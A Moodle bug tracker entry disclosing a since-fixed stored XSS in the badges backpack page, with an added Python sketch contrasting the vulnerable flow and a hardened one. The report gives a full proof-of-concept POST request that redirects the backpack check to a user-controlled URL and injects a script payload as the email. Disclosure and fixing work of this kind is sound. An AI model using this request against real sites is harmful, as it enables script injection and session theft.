Type: Bug
Resolution: Fixed
Priority: Minor
Affects versions: 3.3.4, 3.4.1
Affected branches: MOODLE_33_STABLE, MOODLE_34_STABLE
Fixed branches: MOODLE_33_STABLE, MOODLE_34_STABLE
Pull master branch: MDL-61261-master
Hello,
I discovered a vulnerability in /badges/mybackpack.php where I achieved stored XSS.
Description
When /badges/mybackpack.php makes a request to https://backpack.openbadges.org, it gets a JSON response stating either that the given email exists or that it does not exist.
If I change the URL to a URL under my control (via POST, for example https://pastebin.com/raw/HJWNqwnk?, including the question mark), it will say the email exists and will put the given e-mail on the page (in this case an XSS payload).
URL:
https://localhost/moodle/badges/mybackpack.php

POST data:
userid=1&backpackurl=https%3A%2f%2fpastebin.com%2fraw%2fHJWNqwnk%3F&email=<script>alert(1);</script>&sesskey=:SESSKEY&qf_edit_backpack_form=1&mform_isexpanded_id_backpackheader=1&revertbutton=Connect+using+a+different+email+address

https://i.imgur.com/pQJNLpv.png
Kind regards,
Damian Ebelties
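The two weaknesses the report combines are a backpack URL taken from the POST body without restriction and an email value echoed into the page without HTML escaping. The Python below is an added illustration written for this page, not Moodle's PHP code: it models the flow once as reported and once with a host allowlist plus output escaping. The allowlist contents, the `fetch_json` callback and the `{"status": "okay"}` response shape are assumptions made for the example.

```python
import html
import json
from urllib.parse import urlparse

# Assumption for this example: the only backpack host the page should contact.
ALLOWED_BACKPACK_HOSTS = {"backpack.openbadges.org"}


def backpack_url_allowed(url: str) -> bool:
    """Reject any backpack URL whose scheme or host is not on the allowlist."""
    parsed = urlparse(url)
    return parsed.scheme == "https" and parsed.hostname in ALLOWED_BACKPACK_HOSTS


def email_registered(fetch_json, backpack_url: str, email: str) -> bool:
    """Ask the backpack whether `email` is known to it.

    `fetch_json(url, email)` stands in for the outbound HTTP call and returns the
    raw JSON body. The {"status": "okay"} shape is assumed for this example.
    """
    data = json.loads(fetch_json(backpack_url, email))
    return data.get("status") == "okay"


def render_vulnerable(fetch_json, backpack_url: str, email: str) -> str:
    """The pattern the report describes: any URL accepted, email echoed unescaped."""
    if email_registered(fetch_json, backpack_url, email):
        return "<p>Email " + email + " is registered.</p>"
    return "<p>Email not found.</p>"


def render_hardened(fetch_json, backpack_url: str, email: str) -> str:
    """Same flow with two fixes: allowlist the URL, HTML-escape the echoed email."""
    if not backpack_url_allowed(backpack_url):
        raise ValueError("backpack URL is not an allowed backpack host")
    if email_registered(fetch_json, backpack_url, email):
        return "<p>Email " + html.escape(email, quote=True) + " is registered.</p>"
    return "<p>Email not found.</p>"


# Constructed stand-in for the network call: a server the user controls that
# always answers "okay", which is what makes the unescaped echo reachable.
def fake_user_controlled_backpack(url: str, email: str) -> str:
    return json.dumps({"status": "okay"})


if __name__ == "__main__":
    payload = "<script>alert(1);</script>"
    print(render_vulnerable(fake_user_controlled_backpack, "https://untrusted.example/x?", payload))
    print(render_hardened(fake_user_controlled_backpack, "https://backpack.openbadges.org/", payload))
```

Either fix alone narrows the bug; the escaping is the one that removes the XSS even when the upstream response is trusted.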